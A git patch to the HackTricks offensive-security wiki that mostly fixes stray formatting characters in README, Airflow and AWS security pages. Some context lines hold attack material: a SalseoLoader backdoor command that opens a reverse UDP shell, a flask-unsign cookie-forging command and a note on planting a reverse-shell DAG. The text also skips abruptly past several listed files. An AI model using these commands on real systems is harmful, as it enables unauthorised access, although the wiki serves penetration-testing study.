From cf6fcec19a92756c513be2c6a4c38b9e7032d2b6 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Tue, 5 Apr 2022 18:24:52 -0400 Subject: [PATCH] fix bad chars --- 1911-pentesting-fox.md | 2 +- README.md | 2 +- .../bra.i.nsmasher-presentation/README.md | 6 +- .../bim-bruteforcer.md | 2 +- .../ml-basics/feature-engineering.md | 4 +- about-the-author.md | 4 +- backdoors/salseo.md | 2 +- .../blockchain-and-crypto-currencies.md | 12 +- brute-force.md | 11 +- cloud-security/apache-airflow/README.md | 6 +- .../apache-airflow/airflow-configuration.md | 6 +- cloud-security/aws-security.md | 54 +++--- cloud-security/circleci.md | 4 +- .../concourse/concourse-lab-creation.md | 2 +- .../gcp-privesc-to-other-principals.md | 6 +- ...local-privilege-escalation-ssh-pivoting.md | 4 +- cloud-security/gcp-security/gcp-looting.md | 2 +- .../gcp-security/gcp-persistance.md | 4 +- cloud-security/github-security/README.md | 6 +- .../basic-github-information.md | 2 +- .../README.md | 2 +- .../kubernetes-access-to-other-clouds.md | 4 +- .../kubernetes-enumeration.md | 4 +- .../kubernetes-network-attacks.md | 4 +- cloud-security/workspace-security.md | 12 +- ...d-elearnsecurity-certifications-reviews.md | 10 +- cryptography/certificates.md | 2 +- .../cipher-block-chaining-cbc-mac-priv.md | 2 +- cryptography/crypto-ctfs-tricks.md | 6 +- cryptography/hash-length-extension-attack.md | 2 +- cryptography/rc4-encrypt-and-decrypt.md | 2 +- emails-vulns.md | 4 +- exfiltration.md | 2 +- .../linux-exploiting-basic-esp/README.md | 10 +- .../rop-leaking-libc-address/README.md | 4 +- exploiting/tools/README.md | 6 +- exploiting/tools/pwntools.md | 68 +++---- external-recon-methodology.md | 24 +-- external-recon-methodology/README.md | 12 +- .../malware-analysis.md | 12 +- .../volatility-examples.md | 2 +- .../file-data-carving-recovery-tools.md | 2 +- .../partitions-file-systems-carving/ntfs.md | 2 +- .../pcap-inspection/README.md | 10 +- .../pcap-inspection/wireshark-tricks.md | 6 +- .../.pyc.md | 2 +- .../browser-artifacts.md | 10 +- .../office-file-analysis.md | 2 +- .../windows-forensics/README.md | 6 +- .../interesting-windows-registry-keys.md | 12 +- .../linux-privilege-escalation-checklist.md | 8 +- linux-unix/privilege-escalation/README.md | 16 +- ...-command-injection-privilege-escalation.md | 2 +- .../docker-breakout/README.md | 6 +- .../docker-breakout/apparmor.md | 2 +- ...uthn-docker-access-authorization-plugin.md | 2 +- .../docker-breakout-privilege-escalation.md | 10 +- .../docker-breakout/docker-privileged.md | 2 +- .../electron-cef-chromium-debugger-abuse.md | 2 +- .../escaping-from-limited-bash.md | 10 +- .../interesting-groups-linux-pe/README.md | 2 +- .../ld.so.conf-example.md | 4 +- .../linux-capabilities.md | 4 +- .../nfs-no_root_squash-misconfiguration-pe.md | 2 +- .../splunk-lpe-and-persistence.md | 4 +- .../ssh-forward-agent-exploitation.md | 2 +- .../wildcards-spare-tricks.md | 2 +- .../README.md | 34 ++-- .../mac-os-architecture.md | 18 +- ...s-apps-inspecting-debugging-and-fuzzing.md | 18 +- .../macos-mdm/README.md | 2 +- ...nrolling-devices-in-other-organisations.md | 2 +- .../macos-protocols.md | 6 +- .../macos-red-teaming.md | 4 +- misc/basic-python/README.md | 4 +- .../bypass-python-sandboxes/README.md | 12 +- misc/basic-python/magic-methods.md | 4 +- .../android-app-pentesting/README.md | 30 ++-- .../android-app-pentesting/adb-commands.md | 2 +- .../android-applications-basics.md | 6 +- .../android-burp-suite-settings.md | 2 +- .../android-task-hijacking.md | 6 +- .../android-app-pentesting/apk-decompilers.md | 4 +- .../avd-android-virtual-device.md | 8 +- .../content-protocol.md | 2 +- .../exploiting-content-providers.md | 4 +- .../exploiting-a-debuggeable-applciation.md | 2 +- .../frida-tutorial/README.md | 4 +- .../frida-tutorial/frida-tutorial-2.md | 4 +- .../frida-tutorial/owaspuncrackable-1.md | 6 +- .../google-ctf-2018-shall-we-play-a-game.md | 2 +- .../inspeckage-tutorial.md | 2 +- .../intent-injection.md | 4 +- .../react-native-application.md | 2 +- .../android-app-pentesting/smali-changes.md | 4 +- .../spoofing-your-location-in-play-store.md | 2 +- .../android-app-pentesting/webview-attacks.md | 2 +- mobile-apps-pentesting/android-checklist.md | 6 +- .../ios-pentesting-checklist.md | 6 +- .../ios-pentesting/README.md | 16 +- .../basic-ios-testing-operations.md | 6 +- .../burp-configuration-for-ios.md | 2 +- ...-entitlements-from-compiled-application.md | 2 +- .../ios-pentesting/ios-app-extensions.md | 2 +- .../ios-pentesting/ios-basics.md | 2 +- ...m-uri-handlers-deeplinks-custom-schemes.md | 2 +- .../ios-hooking-with-objection.md | 4 +- .../ios-pentesting/ios-testing-environment.md | 10 +- .../ios-pentesting/ios-uipasteboard.md | 2 +- .../ios-pentesting/ios-universal-links.md | 2 +- .../ios-pentesting/ios-webviews.md | 10 +- other-web-tricks.md | 2 +- pentesting-methodology.md | 4 +- pentesting-web/cache-deception.md | 6 +- pentesting-web/clickjacking.md | 4 +- .../client-side-template-injection-csti.md | 14 +- pentesting-web/command-injection.md | 4 +- .../content-security-policy-csp-bypass.md | 38 ++-- pentesting-web/cors-bypass.md | 4 +- pentesting-web/crlf-0d-0a.md | 2 +- .../cross-site-websocket-hijacking-cswsh.md | 6 +- .../README.md | 6 +- pentesting-web/deserialization/README.md | 28 +-- ...ialization-objectinputstream-readobject.md | 2 +- ...ploiting-__viewstate-knowing-the-secret.md | 4 +- .../exploiting-__viewstate-parameter.md | 8 +- ...g-and-directory-interface-and-log4shell.md | 4 +- .../python-yaml-deserialization.md | 2 +- pentesting-web/domain-subdomain-takeover.md | 2 +- pentesting-web/email-header-injection.md | 6 +- pentesting-web/file-inclusion/README.md | 6 +- pentesting-web/file-upload.md | 8 +- pentesting-web/file-upload/README.md | 12 +- pentesting-web/formula-injection.md | 2 +- pentesting-web/hacking-jwt-json-web-tokens.md | 2 +- .../hacking-with-cookies/cookie-tossing.md | 6 +- .../http-response-smuggling-desync.md | 2 +- pentesting-web/idor.md | 2 +- pentesting-web/oauth-to-account-takeover.md | 8 +- pentesting-web/parameter-pollution.md | 2 +- pentesting-web/race-condition.md | 2 +- .../registration-vulnerabilities.md | 2 +- ...ular-expression-denial-of-service-redos.md | 2 +- pentesting-web/reverse-tab-nabbing.md | 2 +- pentesting-web/sql-injection/README.md | 2 +- .../sql-injection/mssql-injection.md | 6 +- .../sql-injection/mysql-injection/README.md | 4 +- .../mysql-injection/mysql-ssrf.md | 2 +- .../sql-injection/oracle-injection.md | 2 +- .../postgresql-injection/README.md | 14 +- .../big-binary-files-upload-postgresql.md | 6 +- .../dblink-lo_import-data-exfiltration.md | 2 +- .../rce-with-postgresql-extensions.md | 2 +- pentesting-web/sql-injection/sqlmap/README.md | 2 +- .../sqlmap/second-order-injection-sqlmap.md | 2 +- .../README.md | 10 +- .../README.md | 12 +- .../el-expression-language.md | 4 +- .../unicode-normalization-vulnerability.md | 6 +- .../web-vulnerabilities-methodology.md | 118 ++++++------- .../xss-cross-site-scripting/README.md | 6 +- .../xss-cross-site-scripting/dom-xss.md | 30 ++-- .../xss-cross-site-scripting/pdf-injection.md | 166 +++++++++--------- .../xssi-cross-site-script-inclusion.md | 4 +- pentesting-web/xxe-xee-xml-external-entity.md | 4 +- .../README.md | 4 +- .../15672-pentesting-rabbitmq-management.md | 2 +- pentesting/1883-pentesting-mqtt-mosquitto.md | 4 +- pentesting/2375-pentesting-docker.md | 4 +- ...-24008-24009-49152-pentesting-glusterfs.md | 2 +- pentesting/27017-27018-mongodb.md | 2 +- pentesting/3260-pentesting-iscsi.md | 2 +- ...060-50070-50075-50090-pentesting-hadoop.md | 2 +- pentesting/512-pentesting-rexec.md | 2 +- .../515-pentesting-line-printer-daemon-lpd.md | 2 +- pentesting/554-8554-pentesting-rtsp.md | 2 +- pentesting/584-pentesting-afp.md | 2 +- pentesting/5984-pentesting-couchdb.md | 2 +- pentesting/5985-5986-pentesting-omi.md | 2 +- pentesting/5985-5986-pentesting-winrm.md | 2 +- pentesting/623-udp-ipmi.md | 4 +- pentesting/6379-pentesting-redis.md | 6 +- ...09-pentesting-apache-jserv-protocol-ajp.md | 2 +- pentesting/873-pentesting-rsync.md | 2 +- pentesting/9200-pentesting-elasticsearch.md | 2 +- pentesting/cassandra.md | 4 +- pentesting/pentesting-ftp/README.md | 2 +- ...entesting-jdwp-java-debug-wire-protocol.md | 6 +- .../harvesting-tickets-from-linux.md | 2 +- .../attacking-kubernetes-from-inside-a-pod.md | 10 +- .../kubernetes-basics.md | 6 +- .../kubernetes-hardening/README.md | 8 +- .../kubernetes-networkpolicies.md | 4 +- pentesting/pentesting-ldap.md | 2 +- .../pentesting-mssql-microsoft-sql-server.md | 4 +- pentesting/pentesting-mysql.md | 2 +- pentesting/pentesting-network/README.md | 18 +- pentesting/pentesting-network/ids-evasion.md | 2 +- .../spoofing-ssdp-and-upnp-devices.md | 16 +- pentesting/pentesting-ntp.md | 2 +- pentesting/pentesting-postgresql.md | 2 +- pentesting/pentesting-printers/README.md | 32 ++-- .../pentesting-printers/buffer-overflows.md | 2 +- .../credentials-disclosure-brute-force.md | 2 +- .../document-processing.md | 2 +- .../pentesting-printers/file-system-access.md | 2 +- .../pentesting-printers/memory-access.md | 2 +- .../pentesting-printers/physical-damage.md | 4 +- .../transmission-channel.md | 4 +- pentesting/pentesting-rsh.md | 2 +- pentesting/pentesting-smb.md | 8 +- pentesting/pentesting-smtp/README.md | 2 +- pentesting/pentesting-smtp/smtp-commands.md | 2 +- pentesting/pentesting-vnc.md | 2 +- .../pentesting-web/403-and-401-bypasses.md | 6 +- pentesting/pentesting-web/README.md | 10 +- .../artifactory-hacking-guide.md | 2 +- pentesting/pentesting-web/buckets/README.md | 2 +- pentesting/pentesting-web/buckets/aws-s3.md | 6 +- .../buckets/firebase-database.md | 2 +- pentesting/pentesting-web/cgi.md | 2 +- .../pentesting-web/code-review-tools.md | 2 +- pentesting/pentesting-web/flask.md | 2 +- pentesting/pentesting-web/graphql.md | 12 +- pentesting/pentesting-web/jboss.md | 5 +- pentesting/pentesting-web/jenkins.md | 4 +- pentesting/pentesting-web/moodle.md | 2 +- pentesting/pentesting-web/nginx.md | 20 +-- .../pentesting-web/php-tricks-esp/README.md | 2 +- .../README.md | 34 ++-- ...isable_functions-bypass-php-fpm-fastcgi.md | 8 +- .../pentesting-web/put-method-webdav.md | 2 +- .../pentesting-web/special-http-headers.md | 8 +- pentesting/pentesting-web/symphony.md | 8 +- .../pentesting-web/uncovering-cloudflare.md | 4 +- .../pentesting-web/web-api-pentesting.md | 18 +- pentesting/pentesting-web/wordpress.md | 8 +- pentesting/pentesting-wifi/README.md | 6 +- .../pentesting-wifi/evil-twin-eap-tls.md | 2 +- phishing-methodology/README.md | 6 +- phishing-methodology/phishing-documents.md | 4 +- .../escaping-from-gui-applications/README.md | 44 ++--- .../show-file-extensions.md | 2 +- physical-attacks/firmware-analysis/README.md | 26 +-- post-exploitation.md | 14 +- radio-hacking/pentesting-rfid.md | 2 +- reversing/cryptographic-algorithms/README.md | 6 +- .../reversing-tools-basic-methods/README.md | 20 +-- .../cheat-engine.md | 4 +- reversing/reversing-tools/README.md | 6 +- shells/shells/linux.md | 4 +- ...itive-information-disclosure-from-a-web.md | 4 +- todo/hardware-hacking/README.md | 4 +- todo/hardware-hacking/jtag.md | 2 +- todo/hardware-hacking/radio.md | 4 +- todo/hardware-hacking/spi.md | 2 +- todo/misc.md | 2 +- todo/more-tools.md | 2 +- .../active-directory-methodology/README.md | 8 +- .../acl-persistence-abuse.md | 6 +- .../ad-information-in-printers.md | 2 +- .../asreproast.md | 2 +- .../bloodhound.md | 2 +- .../constrained-delegation.md | 2 +- .../custom-ssp.md | 2 +- .../active-directory-methodology/dcshadow.md | 4 +- .../golden-ticket.md | 2 +- .../kerberos-authentication.md | 2 +- ...rivileged-accounts-and-token-privileges.md | 12 +- .../resource-based-constrained-delegation.md | 4 +- .../silver-ticket.md | 2 +- .../skeleton-key.md | 6 +- .../unconstrained-delegation.md | 6 +- .../authentication-credentials-uac-and-efs.md | 22 +-- windows/av-bypass.md | 2 +- windows/basic-cmd-for-pentesters.md | 2 +- .../checklist-windows-privilege-escalation.md | 6 +- windows/ntlm/README.md | 12 +- windows/ntlm/places-to-steal-ntlm-creds.md | 2 +- windows/stealing-credentials/README.md | 6 +- .../credentials-mimikatz.md | 6 +- .../README.md | 14 +- .../access-tokens.md | 6 +- ...ectory-permission-over-service-registry.md | 2 +- .../create-msi-with-wix.md | 2 +- .../dll-hijacking.md | 4 +- .../dpapi-extracting-passwords.md | 6 +- .../leaked-handle-exploitation.md | 8 +- .../named-pipe-client-impersonation.md | 4 +- .../privilege-escalation-abusing-tokens.md | 12 +- 290 files changed, 1036 insertions(+), 1034 deletions(-) diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 8a4cff8f..aa5b6879 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -2,7 +2,7 @@ And more services: -ubiquiti-discover udp "Ubiquiti Networks Device" +ubiquiti-discover udp "Ubiquiti Networks Device" dht udp "DHT Nodes" diff --git a/README.md b/README.md index ed061b74..202edcd6 100644 --- a/README.md +++ b/README.md @@ -24,7 +24,7 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtai LinPEAS, WinPEAS and MacPEAS aren’t enough for you? **Welcome** [**The PEASS Family**](https://opensea.io/collection/the-peass-family), a limited collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) of our favourite PEASS in disguise, designed by my team. **Go get your favourite and make it yours!** And if you are a PEASS & HackTricks enthusiast, you can get your hands now on our [**custom swag**](https://peass.creator-spring.com) **and show how much you like our projects!** -You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ +You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. ## Corporate Sponsors diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/README.md b/a.i.-exploiting/bra.i.nsmasher-presentation/README.md index 857af5c2..17906e05 100644 --- a/a.i.-exploiting/bra.i.nsmasher-presentation/README.md +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/README.md @@ -13,10 +13,10 @@ The platform, which is now in **beta** version, will also feature in the next fu All the **material and the techs for the exploitation of A.I. will be posted here** in a dedicated section of hacktricks. **While** we are in **beta** version and completing the implementation of all the above described features, the subscription and all the already posted labs with their relative **challenges are free**.\ -**So start learning how to exploit A.I. for free while you can in** [**BrA.I.Smasher Website**](https://beta.brainsmasher.eu)****\ -****ENJOY ;) +**So start learning how to exploit A.I. for free while you can in** [**BrA.I.Smasher Website**](https://beta.brainsmasher.eu)\ +ENJOY ;) -_A big thanks to Hacktricks and Carlos Polop for giving us this opportunity_ +_A big thanks to Hacktricks and Carlos Polop for giving us this opportunity_ > _Walter Miele from BrA.I.nsmasher_ diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md index 2fdaee8d..f7fc65e3 100644 --- a/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md @@ -4,7 +4,7 @@ This time we introduce a new type of gradient based attack, in order to brute force an image classification app \(can be shaped and used for any input of course\), the BIM, or Basic Iteration Method. -It’s recommended to see at least the explanation in the [**introduction challenge colab Notebook**](https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR)\*\*\*\* +It’s recommended to see at least the explanation in the [**introduction challenge colab Notebook**](https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR) To go deeper on the BIM topic:[ https://arxiv.org/pdf/1607.02533.pdf](https://arxiv.org/pdf/1607.02533.pdf) diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md index 8363778a..66f877a6 100644 --- a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md @@ -8,7 +8,7 @@ Data can be **continuous** (**infinity** values) or **categorical** (nominal) wh #### Binary -Just **2 possible values**: 1 or 0. In case in a dataset the values are in string format (e.g. "True" and "False") you assign numbers to those values with: +Just **2 possible values**: 1 or 0. In case in a dataset the values are in string format (e.g. "True" and "False") you assign numbers to those values with: ```python dataset["column2"] = dataset.column2.map({"T": 1, "F": 0}) @@ -214,7 +214,7 @@ It might happen that some complete random data is missing for some error. This i It could be that some random data is missing but there is something making some specific details more probable to be missing, for example more frequently man will tell their their age but not women. This is call **Missing at Random** (**MAR**). -Finally, there could be data **Missing Not at Random** (**MNAR**). The vale of the data is directly related with the probability of having the data. For example, if you want to measure something embarrassing, the most embarrassing someone is, the less probable he is going to share it. +Finally, there could be data **Missing Not at Random** (**MNAR**). The vale of the data is directly related with the probability of having the data. For example, if you want to measure something embarrassing, the most embarrassing someone is, the less probable he is going to share it. The **two first categories** of missing data can be **ignorable**. But the **third one** requires to consider **only portions of the data** that isn't impacted or to try to **model the missing data somehow**. diff --git a/about-the-author.md b/about-the-author.md index 542f8af2..f6a6bd88 100644 --- a/about-the-author.md +++ b/about-the-author.md @@ -15,7 +15,7 @@ I also wants to say **thanks to all the people that share cyber-security related * Relevant certifications: **OSCP, OSWE**, **CRTP, eMAPT, eWPTXv2** and Professional Drone pilot * I speak **Spanish** and **English** and little of French (some day I will improve that) * I'm a **CTF player** -* I'm also the developer of [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng)**** +* I'm also the developer of [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng) * And I really enjoy researching, playing CTFs, pentesting and everything related to **hacking** ### Support HackTricks @@ -26,5 +26,5 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtai LinPEAS, WinPEAS and MacPEAS aren’t enough for you? **Welcome** [**The PEASS Family**](https://opensea.io/collection/the-peass-family), a limited collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) of our favourite PEASS in disguise, designed by my team. **Go get your favourite and make it yours!** And if you are a PEASS & HackTricks enthusiast, you can get your hands now on our [**custom swag**](https://peass.creator-spring.com) **and show how much you like our projects!** -You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn abuot latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ +You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn abuot latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. diff --git a/backdoors/salseo.md b/backdoors/salseo.md index af053baa..93152447 100644 --- a/backdoors/salseo.md +++ b/backdoors/salseo.md @@ -62,7 +62,7 @@ SalseoLoader.exe password \\/folder/evilsalsa.dll.txt reverseudp +# Find something like: # Remove that line and rezip the file zip -r file.xls . ``` diff --git a/cloud-security/apache-airflow/README.md b/cloud-security/apache-airflow/README.md index 0cccb827..62bcd86f 100644 --- a/cloud-security/apache-airflow/README.md +++ b/cloud-security/apache-airflow/README.md @@ -2,7 +2,7 @@ ## Basic Information -[**Apache Airflow**](https://airflow.apache.org) **** is used for the **scheduling and **_**orchestration of data pipelines**_** or workflows**. Orchestration of data pipelines refers to the sequencing, coordination, scheduling, and managing complex **data pipelines from diverse sources**. These data pipelines deliver data sets that are ready for consumption either by business intelligence applications and data science, machine learning models that support big data applications. +[**Apache Airflow**](https://airflow.apache.org) is used for the **scheduling and **_**orchestration of data pipelines**_** or workflows**. Orchestration of data pipelines refers to the sequencing, coordination, scheduling, and managing complex **data pipelines from diverse sources**. These data pipelines deliver data sets that are ready for consumption either by business intelligence applications and data science, machine learning models that support big data applications. Basically, Apache Airflow will allow you to **schedule de execution of code when something** (event, cron) **happens**. @@ -10,7 +10,7 @@ Basically, Apache Airflow will allow you to **schedule de execution of code when ### Docker-Compose -You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) **** to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM). +You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM). ### Minikube @@ -65,7 +65,7 @@ flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '1 ### DAG Backdoor (RCE in Airflow worker) If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\ -****Note that this reverse shell is going to be executed inside an **airflow worker container**: +Note that this reverse shell is going to be executed inside an **airflow worker container**: ```python import pendulum diff --git a/cloud-security/apache-airflow/airflow-configuration.md b/cloud-security/apache-airflow/airflow-configuration.md index ad1d40ca..f8147bc0 100644 --- a/cloud-security/apache-airflow/airflow-configuration.md +++ b/cloud-security/apache-airflow/airflow-configuration.md @@ -18,7 +18,7 @@ Some interesting values to check when reading the config file: * **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** * **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** * **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** -* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) **** a few options can be in place to configure who can access to the API: +* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: * `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API * `airflow.api.auth.backend.default`: **Everyone can** access it without authentication * `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** @@ -86,13 +86,13 @@ Some interesting values to check when reading the config file: ### Web Authentication -By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as +By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as ```bash AUTH_TYPE = AUTH_DB ``` -Which means that the **authentication is checked against the database**. However, other configurations are possible like +Which means that the **authentication is checked against the database**. However, other configurations are possible like ```bash AUTH_TYPE = AUTH_OAUTH diff --git a/cloud-security/aws-security.md b/cloud-security/aws-security.md index 3af52568..60be59c6 100644 --- a/cloud-security/aws-security.md +++ b/cloud-security/aws-security.md @@ -42,7 +42,7 @@ This could be a **real person** within your organization who requires access to * **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs). Whenever you need to **change the Access Key** this is the process you should follow:\ -****_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_ +_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_ **MFA** is **supported** when using the AWS **CLI**. @@ -56,7 +56,7 @@ Roles are used to grant identities a set of permissions. **Roles don't have any An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining who can assume the role, and a **permissions policy**, which cannot be empty, defining what they can access. -#### AWS Security Token Service (STS) +#### AWS Security Token Service (STS) This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users). @@ -64,7 +64,7 @@ This is a web service that enables you to **request temporary, limited-privilege #### Policy Permissions -Are used to assign permissions. There are 2 types: +Are used to assign permissions. There are 2 types: * AWS managed policies (preconfigured by AWS) * Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own.. @@ -143,7 +143,7 @@ The app uses the AssumeRoleWithWebIdentity to create temporary credentials. Howe ## KMS - Key Management Service - AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control **_**customer master keys**_** (CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** (HSMs) +AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control **_**customer master keys**_** (CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** (HSMs) KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**.\ KMS is a **region specific service**. @@ -241,7 +241,7 @@ It's possible to **enable S3 access login** (which by default is disabled) to so **Server-side encryption with S3 managed keys, SSE-S3:** This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key. -* Encryption: +* Encryption: * Object Data + created plaintext DEK --> Encrypted data (stored inside S3) * Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory * Decryption: @@ -250,7 +250,7 @@ It's possible to **enable S3 access login** (which by default is disabled) to so Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control. -**Server-side encryption with KMS managed keys, SSE-KMS:** This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail. +**Server-side encryption with KMS managed keys, SSE-KMS:** This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail. * Encryption: * S3 request data keys from KMS CMK @@ -261,7 +261,7 @@ Please, note that in this case **the key is managed by AWS** (rotation only ever * KMS decrypt the data key with the CMK and send it back to S3 * S3 decrypts the object data -**Server-side encryption with customer provided keys, SSE-C:** This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you. +**Server-side encryption with customer provided keys, SSE-C:** This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you. * Encryption: * The user sends the object data + Customer key to S3 @@ -273,7 +273,7 @@ Please, note that in this case **the key is managed by AWS** (rotation only ever * The key is validated against the HMAC value stored * The customer provided key is then used to decrypt the data -**Client-side encryption with KMS, CSE-KMS:** Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored. +**Client-side encryption with KMS, CSE-KMS:** Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored. * Encryption: * Client request for a data key to KMS @@ -285,9 +285,9 @@ Please, note that in this case **the key is managed by AWS** (rotation only ever * The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK * The client can now decrypt the encrypted data -**Client-side encryption with customer provided keys, CSE-C:** Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. +**Client-side encryption with customer provided keys, CSE-C:** Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. -* Encryption: +* Encryption: * The client generates a DEK and encrypts the plaintext data * Then, using it's own custom CMK it encrypts the DEK * submit the encrypted data + encrypted DEK to S3 where it's stored @@ -303,16 +303,16 @@ The unusual feature of CloudHSM is that it is a physical device, and thus it is Typically, a device is available within 15 minutes assuming there is capacity, but if the AZ is out of capacity it can take two weeks or more to acquire additional capacity. -Both KMS and CloudHSM are available to you at AWS and both are integrated with your apps at AWS. Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS. +Both KMS and CloudHSM are available to you at AWS and both are integrated with your apps at AWS. Since 